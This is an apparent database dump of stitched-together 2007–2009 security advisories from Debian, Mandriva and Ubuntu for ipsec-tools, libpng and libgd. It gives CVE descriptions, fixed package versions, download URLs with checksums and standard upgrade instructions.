Size/MD5 checksum: 330258 b905d30958bd5c51d355f286f81b8be1
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_i386.deb
Size/MD5 checksum: 85046 294ccbc4b51e4942edaeec7cd746dfa3
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_ia64.deb
Size/MD5 checksum: 113356 111f0daa2075584c100efc9c11ecef73
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_ia64.deb
Size/MD5 checksum: 468296 bd4d69b5e0d4ee39ec564e1304f7649c
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_mips.deb
Size/MD5 checksum: 89018 b6af57d65d43a7433132bee9657ba608
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_mips.deb
Size/MD5 checksum: 344558 aba2d85d5196c2a46555ad9e478d338a
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_mipsel.deb
Size/MD5 checksum: 346856 97e04d97bdd55f852392d7461bad7f4d
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_mipsel.deb
Size/MD5 checksum: 90308 9e780cda3df3384d0f1e33637d003f21
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_powerpc.deb
Size/MD5 checksum: 91048 98174626d8ad1fba940c81001c337a4f
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_powerpc.deb
Size/MD5 checksum: 337266 9f636e6d8904103b0096a4eed99e9cae
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_s390.deb
Size/MD5 checksum: 341586 b42ddbad323dcdbd775d502f786ab449
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_s390.deb
Size/MD5 checksum: 90750 62d4c3e618a6c69d532b8d8d33bb27b9
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.6.6-3.1etch3_sparc.deb
Size/MD5 checksum: 85710 9f1f526be4f2df4eb64d46023d87c6b3
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.6.6-3.1etch3_sparc.deb
Size/MD5 checksum: 317136 38e50e9d97b46b51d12429b9ea727858
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2.diff.gz
Size/MD5 checksum: 49472 4bc8ba2bd520a7514f2c33021c64e8ce
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1.orig.tar.gz
Size/MD5 checksum: 1039057 ddff5ec5a06b804ca23dc41268368853
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2.dsc
Size/MD5 checksum: 1144 46d3f28156ee183512a451588ef414e4
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_alpha.deb
Size/MD5 checksum: 428532 052c13540da3fab19fdca83e9a389a39
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_alpha.deb
Size/MD5 checksum: 114088 78065dd99d3732291e8d499383af17d9
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_amd64.deb
Size/MD5 checksum: 409514 a421f12270f5b22639d67be8d2cc8b4e
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_amd64.deb
Size/MD5 checksum: 104612 9ec93c697cf64232728d0dd5658efac8
arm architecture (ARM)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_arm.deb
Size/MD5 checksum: 104604 78fa45a7e0503e4ee87e7508294cb0b0
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_arm.deb
Size/MD5 checksum: 381692 f1943edf9599189d16a2f936fa971abc
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_armel.deb
Size/MD5 checksum: 387510 63ebe895d019d2362a0a11a0de0842c6
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_armel.deb
Size/MD5 checksum: 104268 6c224349c910ffce5bb892f2a06dc243
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_i386.deb
Size/MD5 checksum: 375004 5a43cbb6106d576ab686e9e4eb78c245
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_i386.deb
Size/MD5 checksum: 99098 6c81df8c4653265f10ad6abf68091329
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_ia64.deb
Size/MD5 checksum: 131288 dfa8646655028ae53bddad7f41e9f3a4
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_ia64.deb
Size/MD5 checksum: 544150 8e274b6b73125efe0fa8392398e0c5ea
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_mips.deb
Size/MD5 checksum: 103502 5bd00dfdef0862a63bb666ed949e26ef
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_mips.deb
Size/MD5 checksum: 388820 46fc10315192943b912126fe68ffeea9
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_mipsel.deb
Size/MD5 checksum: 104216 a271cb33c891084479ed441945672f14
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_mipsel.deb
Size/MD5 checksum: 390562 352f78906e08ddb861053dfed30640bf
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_powerpc.deb
Size/MD5 checksum: 403162 0210fa37088d78ee9aa53395aa0148e8
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_powerpc.deb
Size/MD5 checksum: 109438 26f043be5fb248d33b605d1987fa472a
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_s390.deb
Size/MD5 checksum: 107474 aa6203b0e9e6dacbe39520be6b849eea
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_s390.deb
Size/MD5 checksum: 399386 e965abdcf32838fff7753e789e703205
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/i/ipsec-tools/ipsec-tools_0.7.1-1.3+lenny2_sparc.deb
Size/MD5 checksum: 102486 57b2e115a15e08518f00158c1fe36cf2
http://security.debian.org/pool/updates/main/i/ipsec-tools/racoon_0.7.1-1.3+lenny2_sparc.deb
Size/MD5 checksum: 373916 7e2278ac7b4f0b352814ad2f55b1213a
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAkoUDnMACgkQHYflSXNkfP8LtgCdF9LmW/TOn9JDPTVGlt+7dccI
3MYAoJVcwmqHztsGgCgBps9hyqzrQJ5l
=84V/
-----END PGP SIGNATURE-----
.
The updated packages have been patched to prevent this.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1632
_______________________________________________________________________
Updated Packages:
Corporate 4.0:
4ccc0eafc222a8a5976a0e9eebbc7499 corporate/4.0/i586/ipsec-tools-0.6.5-2.4.20060mlcs4.i586.rpm
f244df60a927a7aa4a539c2e8d9c699a corporate/4.0/i586/libipsec0-0.6.5-2.4.20060mlcs4.i586.rpm
95443caad35eb54d1f291f7368aac511 corporate/4.0/i586/libipsec0-devel-0.6.5-2.4.20060mlcs4.i586.rpm
0e9a4820ef81a4917d9c0a9c5befa27b corporate/4.0/SRPMS/ipsec-tools-0.6.5-2.4.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
a1ccfd8a891340f52aa2f64d69e46e47 corporate/4.0/x86_64/ipsec-tools-0.6.5-2.4.20060mlcs4.x86_64.rpm
44ed76407c8633fcea7f4a3ab94f1842 corporate/4.0/x86_64/lib64ipsec0-0.6.5-2.4.20060mlcs4.x86_64.rpm
d7a3ecf831ecfcbc1319558303a1be17 corporate/4.0/x86_64/lib64ipsec0-devel-0.6.5-2.4.20060mlcs4.x86_64.rpm
0e9a4820ef81a4917d9c0a9c5befa27b corporate/4.0/SRPMS/ipsec-tools-0.6.5-2.4.20060mlcs4.src.rpm
Multi Network Firewall 2.0:
f43aaba27d5ff88b38db39ebeaaaf5cd mnf/2.0/i586/ipsec-tools-0.2.5-0.7.M20mdk.i586.rpm
fb19d1e75fd8f08ce9dc1586cdf9fa3b mnf/2.0/i586/libipsec-tools0-0.2.5-0.7.M20mdk.i586.rpm
2db168e39d44b361bab9ada981edaa90 mnf/2.0/SRPMS/ipsec-tools-0.2.5-0.7.M20mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFKETmdmqjQ0CJFipgRAloWAJ9wHsc3F9b0lI8E87n8+gT7j4t+jACg8OD2
obN0TVwX9QBtElK0wQeibi8=
=dlxS
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ===========================================================
Ubuntu Security Notice USN-785-1 June 09, 2009
ipsec-tools vulnerabilities
CVE-2009-1574, CVE-2009-1632
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
racoon 1:0.6.5-4ubuntu1.3
Ubuntu 8.04 LTS:
racoon 1:0.6.7-1.1ubuntu1.2
Ubuntu 8.10:
racoon 1:0.7-2.1ubuntu1.8.10.1
Ubuntu 9.04:
racoon 1:0.7-2.1ubuntu1.9.04.1
In general, a standard system upgrade is sufficient to effect the
necessary changes. (CVE-2009-1574)
It was discovered that ipsec-tools did not properly handle memory usage
when verifying certificate signatures or processing nat-traversal
keep-alive messages. A remote attacker could send specially crafted packets
to the server and exhaust available memory, leading to a denial of service |
|
var-200705-0670
|
The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. libpng There is a service disruption (DoS) Vulnerabilities exist PNG (Portable Network Graphics) Format image processing library libpng of png_handle_tRNS() Functions include CRC Incorrect processing after check PNG Denial of service when processing files (DoS) There is a vulnerability that becomes a condition.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) It may be in a state.
Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library.
This issue affects libpng-0.90 through libpng-1.2.16.
This BID is being retired because this issue was addressed in BID 24000 (Libpng Library Remote Denial of Service Vulnerability).
CVE-2007-3476
An array indexing error in libgd's GIF handling could induce a
denial of service (crash with heap corruption) if exceptionally
large color index values are supplied in a maliciously crafted
GIF image file.
CVE-2007-3477
The imagearc() and imagefilledarc() routines in libgd allow
an attacker in control of the parameters used to specify
the degrees of arc for those drawing functions to perform
a denial of service attack (excessive CPU consumption).
CVE-2007-3996
Multiple integer overflows exist in libgd's image resizing and
creation routines; these weaknesses allow an attacker in control
of the parameters passed to those routines to induce a crash or
execute arbitrary code with the privileges of the user running
an application or interpreter linked against libgd2.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1750-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
March 22, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : libpng
Vulnerability : several
Problem type : local (remote)
Debian-specific: no
CVE Id(s) : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040
Debian Bug : 446308 476669 516256 512665
Several vulnerabilities have been discovered in libpng, a library for
reading and writing PNG files. (CVE-2008-1382)
The png_check_keyword might allow context-dependent attackers to set the
value of an arbitrary memory location to zero via vectors involving
creation of crafted PNG files with keywords. (CVE-2009-0040)
For the old stable distribution (etch), these problems have been fixed
in version1.2.15~beta5-1+etch2.
For the stable distribution (lenny), these problems have been fixed in
version 1.2.27-2+lenny2. (Only CVE-2008-5907, CVE-2008-5907 and
CVE-2009-0040 affect the stable distribution.)
For the unstable distribution (sid), these problems have been fixed in
version 1.2.35-1.
We recommend that you upgrade your libpng packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Source archives:
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
Size/MD5 checksum: 829038 77ca14fcee1f1f4daaaa28123bd0b22d
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz
Size/MD5 checksum: 18622 e1e1b7d74b9af5861bdcfc50154d2b4c
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc
Size/MD5 checksum: 1033 a0668aeec893b093e1f8f68316a04041
Architecture independent packages:
http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb
Size/MD5 checksum: 882 eb0e501247bd91837c090cf3353e07c6
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb
Size/MD5 checksum: 214038 1dd9a6d646d8ae533fbabbb32e03149a
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb
Size/MD5 checksum: 204478 d04c5a2151ca4aa8b1fa6f1b3078e418
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb
Size/MD5 checksum: 85270 1fcfca5bfd47a2f6611074832273ac0b
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb
Size/MD5 checksum: 188124 703758e444f77281b9104e20c358b521
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb
Size/MD5 checksum: 179186 d2596f942999be2acb79e77d12d99c2e
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb
Size/MD5 checksum: 69056 4bd8858ff3ef96c108d2f357e67c7b73
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb
Size/MD5 checksum: 63714 14bd7b3fa29b01ebc18b6611eea486d1
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb
Size/MD5 checksum: 168764 54a349016bbdd6624fe8552bd951fee0
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb
Size/MD5 checksum: 182720 79e501f9c79d31b0f9c8b5a4f16f6a2e
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb
Size/MD5 checksum: 74440 e240adb3f2b0f8ed35a3c2fe2dd35da1
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb
Size/MD5 checksum: 187052 e5f7162d516fc3d8e953726d7fb5b6ae
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb
Size/MD5 checksum: 194360 83928ed4057deade50551874a6a85d27
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb
Size/MD5 checksum: 67656 66d9d533e26e4f74fbdd01bf55fa40b1
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb
Size/MD5 checksum: 187710 20da5a533679aee19edf5cd0c339f2c9
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb
Size/MD5 checksum: 170784 b19d4f0f8be4d65dbb847079ce2effa8
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb
Size/MD5 checksum: 227792 eb01ade8e4b4dba3215832b8c632548a
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb
Size/MD5 checksum: 108076 cb3ae7c7c66dcafce969608a437fdade
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb
Size/MD5 checksum: 227388 83fa9e2ba1a370fe1b973688ab6096dd
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb
Size/MD5 checksum: 187814 daa3c7c3aeae294c661324528e0f6c3e
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb
Size/MD5 checksum: 187016 e556557c1c570c66656232422af38c8e
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb
Size/MD5 checksum: 67730 ae7ea1cd95eacae754ba35e9fae19818
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb
Size/MD5 checksum: 67996 4be0aa40152ac55a7355aea2204d7888
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb
Size/MD5 checksum: 187852 19a6eddae81d4f9d768f8c0ef442b0ed
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb
Size/MD5 checksum: 187282 119ae6083edd419fed3fe970cc507919
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb
Size/MD5 checksum: 178452 e48dc544abc3df3ec474930639e29469
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb
Size/MD5 checksum: 186636 b8319bb815dec618288cdd35cd37c191
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb
Size/MD5 checksum: 67430 a3717e7c30011e60be99ce04983f2984
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb
Size/MD5 checksum: 178548 790f01dc85511343a4ef9b4832f3b1fa
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb
Size/MD5 checksum: 190648 a79ea20f0b8af58765d2b14ec276aa5a
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb
Size/MD5 checksum: 71438 aa83c3a2ab4da51670da3eafcedddac9
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb
Size/MD5 checksum: 64914 13bcdda845e00493e1b25413452302d0
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb
Size/MD5 checksum: 184734 0f0e7865607948f07a604c86fd4f94bb
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb
Size/MD5 checksum: 172558 2853d84c9f9823d0bfe77b1fca00348d
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz
Size/MD5 checksum: 16783 64d84ee2a3098905d361711dc96698c9
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz
Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc
Size/MD5 checksum: 1492 8c82810267b23916b6207fa40f0b6bce
Architecture independent packages:
http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb
Size/MD5 checksum: 878 8d46f725bd49014cdb4e15508baea203
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb
Size/MD5 checksum: 287802 470918bf3d543a1128df53d4bed78b3f
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb
Size/MD5 checksum: 182372 df321c1623004da3cf1daacae952e8b6
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb
Size/MD5 checksum: 86746 975dccb76f777be09e8e5353704bf6bf
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb
Size/MD5 checksum: 71944 3f3bdfdee4699b4b3e5c793686330036
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb
Size/MD5 checksum: 254598 122c139abf34eb461eca9847ec9dffe7
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb
Size/MD5 checksum: 167190 1c17a5378b2e6b8fa8760847510f208b
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb
Size/MD5 checksum: 245788 9d3fe182d56caad3f9d8a436ca109b57
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb
Size/MD5 checksum: 64754 81ee041de30e2e5343d38965ab0645c1
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb
Size/MD5 checksum: 160222 5741adc357ec8f3f09c4c8e72f02ec88
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb
Size/MD5 checksum: 67178 71747c7d6f7bffde46bb38055948b781
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb
Size/MD5 checksum: 246680 bb9df968f72c62d5adceab0079c86e02
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb
Size/MD5 checksum: 163028 60bf255a23031c9c105d3582ed2c21bd
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb
Size/MD5 checksum: 261298 a0bac6595474dc5778c764fab4acd9be
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb
Size/MD5 checksum: 170170 de217ce54775d5f648ad369f4ce7cb72
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb
Size/MD5 checksum: 74124 affd4f1155bd1d571615b6c767886974
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb
Size/MD5 checksum: 70314 865ea6726b205467e770d56d1530fdd2
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb
Size/MD5 checksum: 165892 cfcd37b7eee72625d13f09328bc24e23
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb
Size/MD5 checksum: 247056 bc860a52608d966576f581c27e89a86c
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb
Size/MD5 checksum: 305532 d6f329a47a523353fcd527c48abb078c
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb
Size/MD5 checksum: 207604 78b003ade0b48d1510f436f2e5008588
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb
Size/MD5 checksum: 112070 a0f1e5e8a85bcc1995faa1e031f5e16e
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb
Size/MD5 checksum: 68198 a68e0ba1f7a39bd9984414f4160de5bc
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb
Size/MD5 checksum: 262138 f3580912592abe14609134cab2242728
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb
Size/MD5 checksum: 163666 0c9f75230c396553e6062eb397d6b95c
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb
Size/MD5 checksum: 163956 dfda7e322af96e8ae5104cfd9f955e92
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb
Size/MD5 checksum: 68468 9c357d2d831dca03ed0887c58a18c523
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb
Size/MD5 checksum: 262162 a1d0ba1b7adb92a95180e6d65b398b5b
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb
Size/MD5 checksum: 70814 3053467f8b8864802cc7261742abfa00
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb
Size/MD5 checksum: 166240 13acfd773d2a31bd555ac1936411fe95
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb
Size/MD5 checksum: 253322 d4a722d84e5c2f263d72a59dea00ce17
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb
Size/MD5 checksum: 253696 bc748b49195dcd01b5288349e3e85510
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb
Size/MD5 checksum: 73624 f35735be37fc376c56941795a185c742
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb
Size/MD5 checksum: 169052 4cf962619d634ea59a39d14c32134594
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb
Size/MD5 checksum: 66216 07bcad5c11908d2fe6d358dfc94d9051
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb
Size/MD5 checksum: 247212 f388365559e6b9313aa6048c6fa341f9
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb
Size/MD5 checksum: 162316 16f01a96b1fec79e9614df831dba6a05
These files will probably be moved into the stable distribution on
its next update. ===========================================================
Ubuntu Security Notice USN-472-1 June 11, 2007
libpng vulnerability
CVE-2007-2445
===========================================================
A security issue affects the following Ubuntu releases:
